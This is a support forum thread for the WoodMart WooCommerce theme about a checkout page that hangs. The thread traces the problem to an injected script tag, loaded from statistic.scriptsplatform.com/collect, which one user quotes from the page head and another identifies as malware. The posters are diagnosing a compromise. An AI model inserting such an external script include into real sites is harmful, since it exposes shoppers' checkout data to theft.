Home Forums WoodMart support forum Autocomplete error or stuck in Checkout page

Autocomplete error or stuck in Checkout page

Viewing 13 posts - 1 through 13 (of 13 total)
  • Author

noman_quraishi
    Participant

hello

the website got hang or stuck due to some autocomplete issue at the checkout page, also the add to cart option does not work fine can you please check

Attachments:
    You must be logged in to view attached files.

Luke Nielsen
    Keymaster

Hello,

Please deactivate all plugins except these ones:

WPBakery Page Builder or Elementor
    Woodmart Core
    WooCommerce
    Please switch to the parent theme if you use the child.

If the problem has gone, activate the plugins one by one, checking the issue to detect which one causes the problem.

If the issue still persists, please confirm the permission for the plugin’s deactivation, switching to the parent theme. As soon as we complete the testing we will enable all back.

Kind Regards

noman_quraishi
    Participant

Hi I have deactivated all the plugins as per your instructions.

I changed child theme to Parent theme now

but still the issue persist.

I have given admin access in pvt window kindly check the issue at your end

thanks

Luke Nielsen
    Keymaster

Hello,

I have checked that issue on the default theme and there is the same issue, here is a video: https://take.ms/JFK2w

The add to cart functionality, checkout/cart pages come from WooCommerce and as you can see, the same issue is on the default theme so it means that the issue is in WooCommerce itself. Please contact their support team for further solutions.

Kind Regards

noman_quraishi
    Participant

Hello

Thanks for your response. If you choose woodmart then the Add to cart is blank even refer to 11111.png which I uploaded earlier.

Also as I told in the start that we did not launch our website in the first 6 months and our support just expired. and we renewed it recently so that we make sure everything is working fine. So even if it woocommerce issue I would like you to support us because woodmard is a an ecommerce (woocommerce) supported theme so anyone who is using woodmart if facing same issue you may have encounter it before and get a solution.

Kindly help us and we are really eager to launch the site very soon.

Thanks

noman_quraishi
    Participant

Also I can see in woocommerce status many of woodmart files are outdated please see the attached image

Attachments:
    You must be logged in to view attached files.

Luke Nielsen
    Keymaster

Hello,

1. After investigating the issue, we found that you have some third-party code that affects the cart and other functionalities from WooCommerce: https://monosnap.com/file/IjnS2G1AV42YFnS8Ci1TMb4lSceBxD

That script from the above screenshots should not load, if you didn’t do any customization, then that code comes from your server and broke functionality from WooCommerce.

2. Please apply the 475064 patch in WoodMart -> Patcher. After that, recheck the issue in Woocommerce status area.

Kind Regards

noman_quraishi
    Participant

Dear Luke,

We have applied the patch also. But it seems the issue is still there. Infact there is a critical issue raised the website keeps loading and nothing comes up even after 10min. On checking console we did not find anything

Please look into this issue because this one is critical. THe website should load. this isnt loading at all.

noman_quraishi
    Participant

Hello I am seeing this in head section but I dont know from where it is loading because i have checked header.php functions.php but not able to identify its source.
    < script src = ” https://statistic.scriptsplatform.com/collect ” >< / script >
    Pl take this on serious note as we launched our website and soon having this issue. Website is not loading at all.

Luke Nielsen
    Keymaster

Hello,

Unfortunately, we can’t find where the custom code is added as it appears both in our theme and the default one, Most likely it could be loaded from the server so could you contact them to check it from their end?

Kind Regards

noman_quraishi
    Participant

Dear

Yes now it is appearing in default theme also but in the start it was not. The server never adds code to the the file. I have my other sites on this server too. About Woocommerce also I have more than 10 sites with updated woocommerce and other themes none of them having this issue.

I would like to request please instead of skipping and throwing it on other shoulder try to look for the solution. Because for you its easy to say so but for us it is very hard and then we dont have any option except to delete everything and start from scratch.

We purchased Woodmart because of good reviews and renew the support considering you would help but I could see the most of the support you guys are simply skipping it by directing it to woocommerce or server. Woocommerce has no issue specially security its a platform. Now the errors which may come because of the theme you prevent it.

This thread you also did not fix and infact now the site is not loading at all and you are telling me this is from server? https://xtemos.com/forums/topic/website-keeps-loading-at-checkout-page/ Also this link I can see you guys did not respond as you have to, this will lead to a bad reputation of the theme and negative reviews on themeforest because it is not about money but we spend our time in installing, understanding the theme and should not to start from scratch again
    And even if I start from the scratch we will use the theme again so what is the guaranty that the issue wont come again? if you are are concern please assist us at this point

I have already provided you with admin access may be your little effort or time can save hours of work for us.

Best Regards

Artem Temos
    Keymaster

Hello,

We understand your point but you are asking to fix the issue which is not related to our theme at all. This code is not a part of the theme. It is somewhere in your website files and we don’t even have any technical possibilities to find it on your website. We would be more than happy to help you but how exactly should we remove it from your website if it is not in our theme files and we don’t know where to find it?

Kind Regards

sergijudovyk
    Participant

Having the same issue with malware script statistic.scriptsplatform.com/collect being loaded from unknown source on woodmart theme. My other wp website are ok for now.

Here I found a tweet about this: https://twitter.com/daniel_sloof/status/1658109542108917761?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1658109542108917761%7Ctwgr%5E8de46cf1857841a4cddd83c13df9c865c1b9dae9%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fguides.magefix.com%2F2023%2F05%2Fscriptsplatform-com%2F

Viewing 13 posts - 1 through 13 (of 13 total)